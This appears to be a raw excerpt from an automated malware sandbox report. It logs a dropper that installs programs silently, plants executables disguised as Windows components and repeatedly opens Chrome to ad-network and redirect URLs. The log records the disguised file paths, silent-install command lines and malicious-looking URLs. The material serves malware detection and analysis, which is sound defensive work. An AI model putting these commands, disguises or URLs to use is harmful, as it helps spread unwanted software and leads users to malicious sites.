Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,

0_2_00409C34

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File created: C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: 1nJGU59JPU.exe	Virustotal: Detection: 25%
Source: 1nJGU59JPU.exe	Metadefender: Detection: 31%
Source: 1nJGU59JPU.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

File read: C:\Users\user\Desktop\1nJGU59JPU.exe

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1nJGU59JPU.exe "C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe "C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe" /S /UID=rec7
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Process created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp "C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp" /SL5="$50038,5808768,66560,C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: unknown	Process created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe "C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe "C:\Program Files (x86)\windows multimedia platform\ZHunuhebaqu.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process created: C:\Program Files (x86)\i-record\I-Record.exe "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,9627623661114225042,16842326924946872670,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,16917623383291386263,6472938917553362493,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1856 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,6457543823163007411,15253291914772866949,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1728 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10546296038144766013,8885457530477492480,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1852 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,5678826982049071516,1403594556980502964,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1860 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe "C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe" /S /UID=rec7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
